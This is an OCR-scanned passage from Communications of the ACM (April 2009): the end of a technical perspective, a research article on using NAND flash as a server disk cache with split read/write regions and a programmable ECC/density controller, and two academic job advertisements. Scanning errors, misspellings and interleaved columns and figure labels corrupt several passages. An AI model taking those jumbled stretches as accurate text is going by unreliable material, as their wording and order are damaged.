“extended system memoty,” as “storage 
accelerator,” and as “alternative storage 
device.” This characterization resonates 
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with earlierworkon the Five-Minute Rule 
and flash memory (ACM Queue 2008). 
The authors tie these usage models to 
hardware interfaces, namely memory, 
PCI, and disk interfaces such as SATA. 
After reviewing these approaches, the 
authors synthesize a proposed architec- 
ture fora flash-based disk cache. The pro- 
posed memory controller partitions the 
flash memory into separate regions for 
reading and writing in order to accom- 
modate the need to erase large blocks 
prior to writing. Future improvements, 
for example, adaptation of generational 
garbage collection as proposed for log- 
structured file systems, will likely build 
on this foundation. The proposed “flash 
cache hash table,” held in RAM, permits 
efficient mapping of pages to locations 
in flash memory; one wonders whether 
this function could be integrated in the 
virtual memory management already 
ubiquitous in operating systems. 

The authors present results of a de- 
tailed simulation study of their pro- 
posed architecture using a full-system 
simulator. Rather than simply add flash 
to a system including traditional RAM 
and traditional disks, they reduce RAM 
for equal die area before comparing the 
RAM-and-flash system with the tradi- 
tional RAM-only system. Equal power 
consumption could be an alternative 
metric but is left for future study. Simi- 
larly, secondary software effects are 
omitted, forexample, fasteraccess times 
leading to shorter delays due to virtual 
memory faults or misses in the buffer 
pools of file system or database server, 
such that a lower multi-programming 
level can mask all those delays, which 
in turn reduces memory contention and 
thus the RAM required in the system. 

Nonetheless, the results demonstrate 
that with flash memory in a memory hi- 
erarchy, less power and cooling can still 
result in higher processing bandwidth, 
and that the proposed programmable 
controller for flash memory can extend 
the expected lifetime for a given access 
rate. With those results, the proposed 
techniques represent a step toward 
more efficient storage, servers, and data 
centers, reducing costs for data center 
operation and environment emissions. 


Goetz Graefe (goetz.graefe@hp.com) is an HP Fellow and 
member of the Advanced Database Group at Hewlett- 
Packard Laboratories. 
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Integrating NAND 


Flash Devices onto Servers 


By David Roberts, Taeho Kgil, and Trevor Mudge 


Abstract 

Flash is a widely used storage device in portable mobile 
devices such as smart phones, digital cameras, and MP3 play- 
ers. It provides high density and low power, properties that 
are appealing for other computing domains. In this paper, 
we examine its use in the server domain. Wear-out has the 
potential to limit the use of Flash in this domain. To seriously 
consider Flash in the server domain, architectural support 
must exist to address this lack of reliability. This paper first 
provides a survey of current and potential Flash usage models 
in a data center. We then advocate using Flash as an extended 
system memory usage model—OS managed disk cache—and 


describe the necessary architectural changes. Specifically we — 


propose two key changes. The first improves performance 
and reliability by splitting Flash-based disk caches into sepa- 
rate read and write regions. The second improves reliability 
by employing a programmable Flash memory controller. It 


changes the error code strength (number of correctable bits) _ 
and the number of bits that a memory cell can store (cell den- | 


sity) in response to the demands of the application. 


1. INTRODUCTION 
Data centers are an integral part of today’s computing plat- 
forms. As cloud computing initiatives provide IT capabilities 
that incorporate software asa service, itrequires internet service 


providers such as Google and Yahoo to build large-scale data _ 


centers hosting millions of servers. Energy efficiency becomes 
a first-class citizen to address the increasing cost of operat- 
ing a data center. Data centers based on off-the-shelf general- 
purpose processors are unnecessarily power hungry, require 
expensive cooling systems, and occupy a large space. In fact, 
the cost of power and cooling these data centers contributes to 
asignificant portion of the operating cost. Figure 1 breaks down 
the annual operating cost for data centers. It clearly shows that 
the cost of power and cooling servers increasingly contributes 
to the overall operating costs of a data center. 

System memory power (DRAM power) and disk power 
contribute as much as 50% to the overall power consump- 
tion in a data center. Further, current trends suggest that 
this percentage will continue to increase at a rapid rate as 
we integrate more memory modules (DRAM) and disk drives 
to improve throughput. 


Fortunately, there are emerging memory devices in the | 


technology pipeline that may address this concern. These 


devices typically display high density and consume low idle | 
power. Flash, Phase Change RAM (PCRAM) and Magnetic | 


RAM (MRAM) are examples. 
In particular, Flash is an attractive technology that is 
already deployed heavily in various computing platforms. 
VOL, 52 NO. 4 
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Today, NAND Flash can be found in handheld devices such 
as smart phones, digital cameras, and MP3 players. This 
has been made possible because of its high density and low 
power properties. These result from the simple structure of 
Flash cells and its nonvolatility. Its popularity has meant that 
it is the focus of aggressive process scaling and innovation. 

The rapid rate of improvement in density has become the 
primary driver to consider Flash in other usage models. There 
are several Flash usage models in the data center that are cur- 
rently being examined by industry and academia that address 
rising power and cooling costs, among other things. Two com- 
mon usage models are disk caches or storage devices. Some 
efforts have lead to product development,* '° while others have 
influenced storage and memory device standards.'*'° 

This paper provides an overview of the benefits of inte- 
grating Flash onto a server. Specifically, in this paper: 


1. We provide an analysis of current and potential Flash 
usage models for servers. 

2. We argue that the extended system memory model" is 
the best usage model to reduce data center energy when 
the contribution of system memory power exceeds the 
contribution of disk power. 

3. We review two architectural modifications to improve 
NAND-based disk caches.'! First, we show that by split- 
ting Flash-based disk caches into read and write regions, 
overall performance and reliability can be improved. 
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Figure 1: IDC estimates for annual cost spent on powering and 


_ cooling servers and purchasing new servers.”” 
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A previous version of this paper, entitled “Improving NAND 
Flash-based Disk Caches” was published in Proceedings 
of the International Symposium on Computer Architecture 
(ISCA 2008). 


Second, we show that a programmable Flash memory 
controller can improve Flash cell reliability and extend 


memory lifetime. The first programmable parameter is | 


error correction code (ECC) strength. The second is the 
Flash cell density—changing from multilevel cells 
(MLC) to single-level cells (SLC). 


2. BACKGROUND 


2.1. Properties of a NAND Flash device 

Flash memory is a nonvolatile memory device that can be elec- 
trically read, written, and erased. Flash memory cells in NAND 
Flash are connected in series to maximize cell density. Further, 
to improve Flash density, each Flash memory cell can use mul- 
tiple threshold voltage levels to store more than one bit per 
cell. NAND Flash supporting MLC is called MLC NAND Flash. 
NAND Flash using a single threshold voltage level (technically 


two levels) is called SLC NAND Flash. Cutting-edge MLC NAND | 


Flash supports 4 bits per cell. There are significant differences 
in the access time and lifetime of the two types. Although MLC 
Flash is cheaper and bit density is higher relative to SLC, MLC 
is slower to read and write and has shorter lifetime by a factor 
of 10 or more. Typical latencies for read, write, and erase are 
25 us, 250uUs, and 0.5 ms for SLC and 50us, 900s, and 3.5 ms 


for 2-bit MLC. The gap between performance and lifetime is | 


getting worse as the number of bits per Flash cell is increased. 
This may be perfectly acceptable for some applications; for 
example, a tune in an MP3 player may only be replaced every 
few days. A disk cache, however, may have all of its locations re- 
written several times a day depending on the amount of disk 
traffic and size of the cache. 

NAND Flash is organized in units of pages and blocks. A typi- 
cal Flash page is 2KB in size and a Flash block is made up of 64 
Flash pages (128KB). Random Flash reads and writes are per- 


formed on a page basis and Flash erasures are performed per | 


block. A Flash must perform an erase on a block before it can 
write to a page belonging to that block. Each additional write 
must be preceded by an erase. Therefore ouwt-of-place writes are 
commonly used to mitigate wear-out. These writes append new 
data to the end of the log while old data pages are invalidated. 


NAND Flash can also be dynamically configured to sup- | 


port multiple Flash memory cell types for each page or 
block. In fact, such devices are now commercially available, 
e.g., Samsung’s Flex-OneNAND.° Figure 2(a) illustrates the 
organization of an SLC/MLC dual-mode device. Pages in 
SLC mode consist of 2048 bytes of data area and 64 bytes of 
“spare” data for ECC bits. When in MLC mode, an SLC page 
can be split into two 2048 byte MLC pages. Pages are erased 
together in blocks of 64 SLC pages or 128 MLC pages. 

When the number of faulty bits per block exceeds the capa- 
bilities of an ECC, blocks are disabled, reducing the capacity 
of the memory. This is an instance of wear-out affecting system 
performance over time, especially, for file cache applications. 

MLC Flash ages quicker than SLC Flash. An MLC Flash 
can support fewer reliable write/erase (W/E) cycles due to the 
smaller threshold voltage margins between bit values. New 
Flash architectures® can circumvent this problem by switch- 
ing from high-density MLC to lower density or even single- 
level mode to counter wear-out. No policy currently exists to 
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Figure 2: (a) Example dual-mode SLC/MLC Flash bank organization 
and (b) time spent in garbage collection as a function of the Flash 
space in use. 
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(b)Garbage collection 


perform the mode selection, so we propose a mechanism for 
changing mode, tailored to a disk caching application. 
Because Flash blocks have a limited number of erases 
before they develop faulty bits, a wear-leveling algorithm 
attempts to equalize the number of erases performed on 
each block.’ This has to be achieved without performing 
more erases than necessary. The simplest method of wear- 
leveling is to treat the device as a circular log. New data is 
written to the next available page and the old page is invali- 
dated. However, wear-leveling causes fragmentation prob- 
lems. Fragmentation is addressed with garbage collection. 
The process of garbage collection reads valid pages from 
erase blocks containing some invalid pages, then writes 
them to a previously erased block.’ Garbage collections free 
up pages that are ready to write new data. This process takes 
time and increases the amount of wear in the Flash blocks. 
The overhead in garbage collection increases as less 
free space is available on Flash. This becomes a significant 
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problem, because garbage collection generates extra writes 
and erases in Flash, reducing performance and endurance as 
the occupancy of the Flash increases. Figure 2(b) shows how 
the time spent garbage collecting increases as more Flash 
space is used. It is normalized to an overhead of 10% and is 
for a 2GB Flash memory. It can be seen that garbage collec- 
tion becomes overwhelming well before all of the memory is 
used. 


2.2. NAND Flash usage models in a server 
Industry and researchers in academia are making strides to 
integrate Flash onto the data center. Industry has recently 
released several Flash-based products and Flash standards 
targeted for servers, while researchers in academia have 
recently published several papers proposing techniques for 
integrating emerging memory technologies including Flash. 
NAND Flash usage models pursued by industry and aca- 
demia can be categorized as follows: 


1. Extended system memory usage model: A NAND Flash 
memory module is connected to the current system 
memory interface or to a dedicated Flash memory 
interface. 

. Storage accelerator usage model: A NAND Flash PCI 
express card is connected to the PCI express interface. 

3. Alternative storage device usage model: A Solid State 

Drive (SSD) replaces or augments the hard disk drive. It 
is connected to the disk interface. An example would 
be a SATA SSD. 


Each usage model presents a unique set of benefits 
and challenges. Table 1 qualitatively captures them. The 
“extended system memory” usage model presents Flash 
as a part of the system memory. It addresses the rising 
contribution of power consumed by DRAM in addition to the 
electrical constraints limiting the integration of more system 


The “storage accelerator” usage model presents Flash 
as a PCI express device that can be directly managed by the 
user application. This usage model allows the server appli- 
cation to manage Flash directly as a cache that stores fre- 
quently accessed code and data. It reduces the number of 
accesses to the hard disk drive thereby reducing overall disk 
power. Further, it may also be used as a way to implement 
the “extended system memory” usage model but with sev- 
eral drawbacks such as higher latency, lower throughput and 
added complexity in managing Flash. Flash management is 
distributed across the user application, device driver stack and 
the Flash PCI express card firmware. To truly leverage Flash as 
a “storage accelerator,” the user application should be Flash 
aware. A device driver stack needs to be implemented to sup- 
port the PCI express device. The device driver stack needs to 
implement device sharing mechanisms such that other con- 
current user applications and kernel components can make 
use of it simultaneously. In Fusion-io’s Solid State Storage’ 
they have also shown the “storage accelerator” usage model 
can expose the Flash PCI express device as an SSD by provid- 
ing disk emulation features in the device driver stack. 

The “alternative storage device” usage model presents 
Flash as an SSD that replaces a hard disk drive.'® This usage 
model improves the latency and throughput to disk and 
reduces overall disk power consumption in a data center. 
With appropriate filesystems such as ZFS,'° it improves stor- 
age device scalability in a data center. Industry has heavily 
adopted this usage model and has recently released several 
products.*° These solid state drives are used to implement 
a storage area network (SAN) or network attached storage 
(NAS) in a data center. They employ similar reliability features 
such as RAID, commonly found in a hard disk drive based 


_ SAN or NAS. Flash reliability management is performed by 


memory. For example, to increase storage capacity without | 


having to reduce the operating frequency of the memory 
channel, MetaRAM" packs more DRAM onto each DIMM 
module. Using denser memory such as Flash may serve a sim- 
ilar purpose. However, this usage model requires modifica- 
tion to the operating system kernel. Specifically, the current 
implementation in the kernel memory manager that sup- 
ports nonuniform memory architectures needs to be aware 
of the unique organization and behavior of Flash. Flash reli- 
ability management can be performed by the kernel memory 
manager with the assistance of the Flash controller. 


the Flash device controller in the SAN or NAS. However, this 
usage model also requires modification in the kernel, and a 
complex Flash device controller that is capable of perform- 
ing intelligent Flash reliability management. A customized 
filesystem needs to be implemented to fully take advantage of 
the benefits of Flash."* '° Further, this usage model ties itself 
to the non-Flash aware features that are found in a hard disk 
drive interface protocol such as SATA. For example, the device 
driver can only communicate to disk using SATA commands 
that are not defined with Flash in mind. On the other hand, 
the operating system in the “extended main memory” model 
has full visibility of memory page classification and activity 
statistics that can be used for more intelligent mapping of 
data to Flash. 


Table 1: Comparison of Flash usage models in a server. 


Primary Secondary Hardware OS kernel Application 
powersavings powersavings complexity modification modification Comments 
Extended system DRAM Disk Minimal Medium None Extend kernel memory manager 
memory to manage Flash devices 
1/0 accelerator Disk DRAM Medium Medium Yes Need to build I/O accelerator 
driver stack 
Alternative storage Disk DRAM High Minimal None Need to implement filesystem 
device for Flash 
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Servers clearly benefit from all three usage models that 
essentially integrate Flash as a faster hard disk or disk cache. All 
usage models help (1) reduce unnecessary standby power from 
hard disk drives and (2) improve overall throughput by reading 
and writing from disk cache instead of a hard disk drive. 

In the remainder of this paper, we examine Flash-based 
disk cache architectures that improve Flash manageability 
and reliability in the extended system memory usage model. 
We believe this usage model is effective in addressing the 
increasing power consumption in system memory. Our stud- 
ies on servers have revealed the system memory architecture 
to be the critical component in delivering high throughput 
in a data center.’° 


3. PROPOSED ARCHITECTURE 


3.1. Architecture of the Flash-based disk cache 

The right side of Figure 3 shows the Flash-based disk cache 
architecture for the extended system memory usage model. 
Compared to a conventional DRAM-only architecture shown 
on the left side of Figure 3, our proposed architecture uses a 
two level disk cache, composed ofa relatively small DRAM in 
front of a dense Flash. The much lower access time of DRAM 
allows it to act as a cache for the Flash without significantly 
increasing power consumption. A Flash memory controller 
is also required for reliability management. 

Our design uses a NAND Flash that stores 2 bits per cell 
(MLC) and is capable of switching from MLC to SLC mode 
using techniques proposed in Flex-OneNAND® and Cho.’ 
Finally, our design uses variable-strength ECC to improve 
reliability while adding the smallest possible delay. 


LA TTA ES IETS AED READ GS BET es LT BER Mt AEB ER OP SA EA ETE, 
Figure 3: 1GB DRAM is replaced with a smaller 256 MB DRAM and 
1GB NAND-based Flash. Additional components are added to control 
Flash. 
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Operating System Support: Our proposed architecture 
requires additional data structures to manage the Flash 
blocks and pages. These tables are read from the hard disk 
drive and stored in DRAM at run-time to reduce access 
latency and mitigate wear-out. Together, they describe 
whether pages exist in DRAM or Flash, and specify the vari- 
ous Flash memory configuration options for reliability. For 
example, the FlashCache Hash Table allows the operating 
system to quickly look up the location of a file page. The 
Flash Page Status Table keeps track of the ECC strength, 
MLC/SLC mode and access frequency for each page. Each 
Erase block has an entry in the Block Status Table to deter- 
mine how worn out it is. Finally, the Global Status Table 
records how quickly the Flash-based disk cache is satisfying 


| requests, and is the number we try to maximize while the 


system is running. 

The storage overhead of the four tables are less than 2% 
of the Flash size. The FlashCache Hash Table and Flash Page 
Status Table are the primary contributors because an entry 
is needed for each Flash page. Our Flash-based disk cache 
is managed in software (OS code) using the tables described 
above. We found the performance overhead in executing 
this code to be minimal. 

Splitting Flash into Read and Write Regions: We divide 
the Flash into a read disk cache and a write disk cache. Read 
caches are less susceptible to out-of-place writes, which 
reduce the read cache capacity and increase the risk of gar- 
bage collection. An out-of-place write happens when existing 
data is modified, because Flash has to be erased before it 
can be written to a second time. It is simple to invalidate the 
old data page (using the Page Status Table and modifying 
the Hash Table) then write new data into a previously erased 
page. However, the invalid pages accumulate as wasted 
space that will have to be garbage collected later. By splitting 
Flash into read and write regions, we were able cut down on 


_ time consuming garbage collections. 


Figure 4 shows an example that highlights the benefits 
of splitting the Flash-based disk cache into a read and write 
cache. The left side shows the behavior of a unified Flash- 
based disk cache and the right side shows the behavior of 
splitting the Flash-based disk cache into a read and write 
cache. Figure 4 assumes we have five pages per block and 
five total blocks in a Flash-based disk cache. Garbage collec- 
tion proceeds by reading all valid data from blocks contain- 
ing invalid pages, erasing those blocks and then sequentially 
re-writing the valid data. In this example, when the Flash- 
based disk cache is split into a read and write cache, only two 
blocks are candidates for garbage collection. This dramati- 
cally reduces Flash reads, writes, and erases compared to a 
unified Flash-based disk cache that considers all five Flash 
blocks. Our studies also show that the overall disk cache 
miss rate is reduced substantially for online transaction pro- 
cessing (OLTP) applications by splitting the Flash. 


3.2. Architecture of the Flash memory controller 

Flash needs architectural support to improve reliability and 

lifetime when used as a cache. Figure 6 shows a high-level 

block diagram of a programmable Flash memory controller 

that addresses this need. Requests from the operating system 
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Figure 4: Example showing the benefits of splitting the Flash-based disk cache into Read and Write caches. In the five erase blocks, pages of 
data that have been evicted from the cache and invalidated are grayed out. On the left, a unified cache allows pages that are heavily read and 
written to be placed in any erase block. This results in scattered invalid pages. Our split read/write cache forces read and write-dominated 
data into two separate sets of erase blocks. As a result, invalid pages are clustered and fewer blocks have to be erased to prepare the invalid 


pages for another write. 


ified cache 


Before garbage collection 


After garbage collection 


5 Flash block erases, 20 Flash page writes, 


20 Flash page reads 


Read cache 


Write cache 


Before garbage collection 


After garbage collection 


2 Flash block erases, 5 Flash page writes, 


Occupied valid Flash page 


WW Invalid Flash page 


provide the address being accessed and any data to be written. 
In addition, the OS specifies the strength of ECC and whether 
the page is in MLC or SLC mode. The controller returns any 
data that was read along with information concerning the 
number of errors currently being corrected by the ECC logic. 
Our architecture uses a BCH encoder and decoder to per- 
form error correction and a CRC checker to perform error 
detection. The BCH code guarantees that a number of faulty 
bits can be corrected. However, as the number of faulty bits 
increases it takes longer to perform the correction. Doubling 
the number of correctable bits approximately doubles the 


time needed to decode the data and extract the correct value. | 


Our system adapts the ECC strength to the appropriate num- 
ber of faulty bits in each page to achieve graceful Flash wear- 
out. The relationship between number of correctable bits 
and erase count is shown in Figure 5. It shows that stronger 
ECC effectively improves page lifetime. The different lines 
on the graph show the effects of different levels of variability 
in the likelihood of bits being faulty. As the standard devia- 
tion increases, the number of tolerated erases decreases 


for any particular error correction strength. It shows that _ 


process variability has a negative impact on lifetime and 
requires more bits to be corrected for the same lifetime. As 
process technology advances and cells become smaller, the 
effect of variability will become even more pronounced. 
Our programmable Flash memory controller also dynam- 


ically controls the density of a Flash page. Density control | 
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benefits Flash performance and endurance, because we are 
able to reduce access latency for frequently accessed pages 
and possibly improve endurance for aging Flash pages by 


Figure 5: Maximum tolerable Flash Write/Erase cycles for varying 
code strength. 
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Figure 6: Flash memory controller architecture. The Flash disk cache device driver sends requests to the hardware interface. These requests 
also specify the ECC strength and density mode of the accessed page. In turn, the controller accesses the Flash chip after performing ECC 
encoding for a write, or decoding for a read. The device driver software receives any requested data along with an indication of the number 

of failing Flash bits. 
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changing M el a a Ta BRS papers as needed. To show the Figure 7: Optimal access latency and SLC/MLC partition for various 
potential improvement of Flash performance by controlling  muttimode MLC Flash sizes. 


density, we present a study using real disk traces. 

Using disk activity traces from the University of Mas- 
sachusetts Trace Repository” for financial and web search 
applications, we analyzed the average access latency for dif- 3,000 
ferent SLC/MLC partitions, for several Flash sizes. 

A hybrid allocation of SLC and MLC Flash provides mini- 
mum access latency, because it is sometimes more effec- 
tive to store heavily used data in a faster SLC page and lose 
one page of storage space. Figure 7 shows the average delay 
(left y-axis) achieved for an optimal partition (right y-axis) 
between SLC and MLC. The x-axis shows the Flash memory 
area and extends far enough to contain the entire working 
set. As expected, when the size of the cache approaches 0 1 
the entire workload, latency reaches a minimum using - : “ 
only SLC cells. Intermediate Flash sizes provide minimum Flash die area (mm?) 
latency through a combination of MLC and SLC with the Websearch]: working set size 5116.7MB 
most frequently accessed data in the faster SLC cells. The —@— Latency (us) —#— Optimal SLC fraction 
best division between SLC and MLC depends on the access 4,000 100 
frequencies of the data pages. For example, if there are hot 
pages that are significantly more active than other pages, the 
bias will be towards SLC. This type of behavior is exhibited aq S00 
by the Financial2 trace (Figure 7(a)) where the SLC alloca- 
tion grows rapidly with Flash capacity. If the access frequen- 
cies are more uniform (e.g., Websearch1 in Figure 7(b)) it is 
better to have a bigger (MLC) cache to increase the number 
of accesses to Flash because going to disk is much slower. 


Financial2: working set size 443.8MB 
—@— Latency (us) —— Optimal SLC fraction 
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3.3. Operation and dynamic reconfiguration | 0 
We use a typical software device driver interface to access | 0 500 1,000 

the Flash memory controller. The driver specifies which Flash die area (mm?) 

Flash address is to be accessed along with the read or write 

mode. For a write, the driver also sends the new data to the a — 
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controller. Using the configuration tables stored in DRAM, 
the driver tells the Flash controller what error correction 
strength and cell density to use for each access. In this sec- 
tion we provide more details on how the cache operates and 
how its settings are reconfigured on the fly. 

Theory of Operation: In this section we summarize how 
the operating system and controller interact (see Kgil'' for 
a full description). The concepts are similar to ordinary disk 
caches except that it is now a two-level cache. The first level 
of cache resides in DRAM, and the second level consists of 
Flash memory. In addition, the Flash portion of the cache 
has to be reconfigured on the fly to maximize performance 
and reliability. The DRAM, with fast, uniform read and 
write latency, no wear-out and no density modes, is easier 
to handle. 

When a file read is performed, the OS searches for the 
file in the primary disk cache located in DRAM. If the page 
is found in DRAM, the file content is accessed directly 
from the primary disk cache—no access to Flash related 
data structures is required. Otherwise, the OS determines 
whether the requested file currently resides in the second- 
ary (Flash) disk cache. If the requested file is found, then 
a Flash read is performed and the Flash content is trans- 
ferred to DRAM. 

If the data is not found in Flash, we first look for an empty 
Flash page in the read cache. If there is no empty Flash 
page available, we first select a block for eviction to disk, 
freeing Flash pages for the newly read data. The data being 
replaced is usually the “least recently used” (LRU) block so it 
is unlikely to be needed again. Such an access would have to 
go all the way to disk, increasing program execution time, so 
the LRU algorithm reduces the likelihood of this happening. 
Concurrently, a hard disk drive access is scheduled using the 
device driver interface. The hard disk drive content is copied 
to the primary disk cache in DRAM and also the read cache 
in Flash. 

If we write to a file, we typically update/access the page in 
the primary disk cache and this page is periodically sched- 
uled to be written back to the secondary disk cache and later 
periodically written back to the disk drive. When writing 
back to Flash, we first determine whether it already exists on 
Flash. If it is found in the write region, we update the page by 
doing an out-of-place write to the write cache. If it is found in 
the read cache, then we move it to the write cache. If it is not 
found in the Flash, we allocate a page in the write cache. 

In the background, garbage collections are triggered 
when the Flash-based disk cache starts to run out of space. 
The cached data is also periodically flushed back to disk if it 


Configuration policies are applied to select those modes, 
maximizing performance as the application demands 
change and the Flash eventually develops faulty bits. 

There are two main triggers for an ECC strength or den- 


_ sitymode change. These are (1) an increase in the number of 


has been modified. Concurrent with the normal cache oper- | 


ation, the reliability management algorithms continuously 


try to adapt the Flash configuration to provide maximum | 


benefit. We have already seen that the configuration changes 
with the application software. The next section describes the 
configuration policies enforced to achieve this. 
Reconfiguring the Flash Memory Controller: 
Page Status Table (FPST) specifies the reliability control 
settings for each page of flash. When the OS reads and 
writes to/from the Flash controller, it also sends configura- 


The Flash | 


tion bits specifying the various modes for the Flash page. | 
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faulty bits and (2) a change in access (read) frequency. Each 
trigger is explained below: 

When new bit errors are observed and fail consistently 
due to wear-out, we reconfigure the page. This is achieved 
by enforcing a stronger ECC or reducing cell density from 
MLC to SLC mode. We choose the option with the minimum 
increase in latency using some simple heuristics. They take 
into account how active that particular page is to determine 
its impact on the system as a whole. It also considers the cur- 
rent level of wear-out for the page. 

Some heavily accessed pages will benefit from being in 
SLC storage simply because of its lower latency. If a page is 
in MLC mode and the entry in the FPST field that keeps track 
of the number of read accesses to a page reaches a limit, we 
migrate that Flash page to a new empty page in SLC mode. 
If there is no empty page available, a Flash block is evicted 
and erased using our wear-level aware replacement policy. 
Reassigning a frequently accessed page from MLC mode to 
SLC mode improves performance by improving hit latency. 
Because many accesses to files in a server platform have a 
tailed distribution (Zipf) with hot and cold data, improv- 
ing the hit latency to frequently accessed (hot) Flash pages 
improves overall performance despite the minor reduction 
in Flash capacity. 

If a Flash page reaches the ECC strength limit and has 
already been set to SLC mode, the block is removed perma- 
nently and never considered when looking for pages to allo- 
cate ina disk cache. 


4. METHODOLOGY 

We evaluated the Flash memory controller and Flash device 
using a full system simulator called M5.” The M5 simulation 
infrastructure is used to generate access profiles for esti- 
mating system memory and disk drive power consumption 
along with published access energy data. We developed a 
separate Flash disk cache simulator for reliability and disk 
cache miss rate experiments where very long traces are nec- 
essary, because full system simulators are slow. Given the 
limitations in our simulation infrastructure, a server work- 
load that uses a large working set of 100-1000’s of gigabytes 
cannot easily be evaluated. We scaled our benchmarks, sys- 
tem memory size, Flash size, and disk drive size accordingly 
to run on our simulation infrastructure. 

We also generated micro-benchmark disk traces to model 
synthetic disk access behavior. They represent typical access 
distributions and approximate real disk usage. To properly 
stress the system, some micro-benchmarks with uniformly 
random and exponential distributions were also generated. 

We used disk traces from University of Massachusetts 
Trace Repository’ to model the disk behavior of enterprise 
level applications like web servers, database servers, and 
web search. To measure performance and power, we used 
dbt2 (OLTP) and SPECWeb99 which generated representa- 
tive disk/disk cache traffic. 


5. RESULTS 

5.1. System memory and disk energy efficiency 
Figure 8 shows a breakdown of power consumption in the 
system memory and disk drive (left y-axis). Figure 8 also 
shows the measured network bandwidth (right y-axis). 
Throughput measured as network bandwidth is a good 
indicator of overall system performance as it represents the 
amount of data that the server can handle in each configura- 
tion. We calculated power for a DRAM-only system memory 
and a heterogenous (DRAM + Flash) system memory that 
uses a Flash as a secondary disk cache with hard disk drive 


support. We assume equal die area for a DRAM-only system | 


memory anda DRAM + Flash system memory. Figure 8 shows 
the reduction in disk drive power and system memory power 
that results from adopting Flash. Our primary power savings 
for system memory come from using Flash instead of DRAM 
for a large amount of the disk cache. The power savings for 
disk come from reducing the accesses to disk due to a big- 
ger overall disk cache made possible by adopting a Flash. We 
also see improved throughput with Flash because it displays 
lower access latency than disk. 


5.2. Impact of BCH code strength on system 
performance 

We have already mentioned that BCH latency incurs an addi- 
tional delay beyond the initial access latency. We simulated 
the performance of the SPECWeb99 and dbt2 benchmarks 
to observe the effect of increasing code strength that would 


occur as Flash wears out. It is assumed that all Flash blocks | 


have the same ECC strength applied. We also measured per- 
formance for code strengths (more than 12 bits per page) 
that are beyond our Flash memory controller’s capabilities 
to fully capture the performance trends. 

From Figure 9, we can see that throughput degrades 
slowly with ECC strength. dbt2 suffers a greater performance 
loss than SPECWeb99 after 15 bits per page. The disk bound 
property of dbt2 makes it more sensitive to ECC strength. 


5.3. Improved Flash lifetime with reliability support in 
Flash memory controller 

Figure 10 shows a comparison of the normalized number 
of accesses required to reach the point of total Flash failure 
where none of the Flash pages can be recovered. We com- 
pare our programmable Flash memory controller with a 
BCH 1-bit error correcting controller. Our studies show that 
for typical workloads, our programmable Flash memory 
controller extends lifetime by a factor of 20 on average. For 
a workload that would previously limit Flash lifetime to 6 
months, we show it can now operate for more than 10 years 
using our programmable Flash memory controller. This was 
accompanied by a graceful increase in overall access latency 
as Flash wore out. 


6. CONCLUSIONS AND FUTURE WORK 

This paper presents the challenges and opportunities in inte- 
grating Flash onto a server platform. Flash is an attractive 
candidate for integration because it reduces power consump- 
tion in system memories and disk drives while improving 


Figure 8: Breakdown in system memory and disk power and network 
bandwidth for architecture with/without a Flash-based disk cache. 
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overall throughput. This in turn can reduce the operating 
cost ofa server platform, which is a growing concern in a data 
center. We presented three key usage models of Flash and 
examined an architecture for the “extended system memory” 
usage model. Our proposed architecture carefully manages 
the Flash and uses it as a secondary disk cache split into a 
separate read cache and write cache. We observed a dramatic 
improvement in power consumption and performance. In 
our simulation studies, a Flash-based disk cache improved 
the DBT2 database benchmark performance by over 25% 
while reducing memory and disk power by 44%. For a web 
server benchmark, performance improvement was around 
11% with a power reduction of 73%. This does not account 
for potentially larger systemwide energy savings obtained 
from speeding up system response and increasing idle time. 


' Assuming that a server can enter a low-power mode while 


APRIL 2009 VOL,52. NO,4 COMMUNICATIONS OF THE ACM 105 


research highlights 


accessed contents would be located in regions composed 
of reliable low latency SLC. In general, we found that vari- 
able ECC strength gracefully extended Flash lifetime, and 
that the overhead of ECC is minimized with configurable 
_ density. Combining all of our techniques, we saw an aver- 
age 20x lifetime improvement relative to a system using 
only a single ECC. We believe our findings are applicable 
not only to Flash but also to emerging memory technology 
devices such as PCRAM.! 
New memory technologies are creating opportunities for 
_ increased performance and efficiency in a data center. These 
ie disruptive technologies are forcing architects to rethink the 
0 current system memory and storage hierarchy in a server. 


Figure 9: Average throughput as a function of ECC strength. The 
system used 256MB of DRAM and 1GB of Flash. 
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and disk. 

We also showed that a Flash memory controller with | 
reliability support greatly improves Flash lifetime. We 
found that the best configuration of a Flash memory 
controller is largely dependent upon the access patterns 
resulting from the application. For example, we found 
that the typical workload with Zipf access behavior was | 
best served by a Flash configured such that the heavily | 
VOL. 52 NO. 4 


106 COMMUNICATIONS OF THE ACM APRIL 2009 


© ACM 0001-0782/09/0400 $5.00 


Fraunhofer Center — Maryland 
Measurement & Knowledge Management 
Division Researcher 


The Fraunhofer Center — Maryland, a non-profit 
research institute affiliated with the University of 
Maryland, is looking for a motivated researcher/ 
analyst to join our team. This position offers a 
unique chance to conduct software engineering 
research and publish on projects that apply in- 
tellectual rigor to real-life problems and have an 
impact on organizations’ practices. 

The qualified candidate will work in a col- 
laborative, team-oriented environment. Work 
activities may include: Collection of quantitative 
and qualitative data through interviews, surveys, 
analyses of work products, etc.; designing solu- 
tions for storing and analyzing such data; design- 
ing and evaluating tools that relate such analyses 
to customer needs. 

Candidates should have: A PhD, Master’s, or 
equivalent degree ina field related to software en- 
gineering; good scientific and technical writing 
skills; familiarity with measuring the effective- 
ness of software- or system-development process- 
es, practices, or tools; good communication skills 
and an ability to work effectively with experts 
from other teams and present research results to 
customers; good problem-solving skills. 

For more information see http://fe-md.umd. 
edu/jobs 

To apply please forward your CV to Forrest 
Shull (fshull@fc-md.umd.edu) 


The Hong Kong Polytechnic University 
Department of Computing 


The Department invites applications for Profes- 
sors/Associate Professors/Assistant Professors 
in Database and Information Systems / Bio- 
metrics, Computer Graphics and Multimedia / 
Software Engineering and Systems / Network- 
ing, Parallel and Distributed Systems. Appli- 
cants should have a PhD degree in Computing 
or closely related fields, a strong commitment 
to excellence in teaching and research as well 
as a good research publication record. Appli- 
cants with extensive experience and a high level 
of achievement may be considered for the post 
of Professor/Associate Professor. Please visit 


the website at http://www.comp.polyu.ed.hk for | 


more information about the Department. Sal- 
ary offered will be commensurate with qualifi- 
cations and experience. Initial appointments 
will be made on a fixed-term gratuity-bearing 
contract. Re-engagement thereafter is subject 
to mutual agreement. Remuneration package 
will be highly competitive. Applicants should 
state their current and expected salary in the 
application. Please submit your application 


via email to hrstaff@polyu.edu.hk. Application | 


forms can be downloaded from http://www. 
polyu.edu.hk/hro/job.htm. Recruitment will 
continue until the positions are filled. Details 
of the University’s Personal Information Col- 
lection Statement for recruitment can be found 


| at http://www.polyu.edu.hk/hro/jobpics.htm. 


ADVERTISI 
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7ARE 


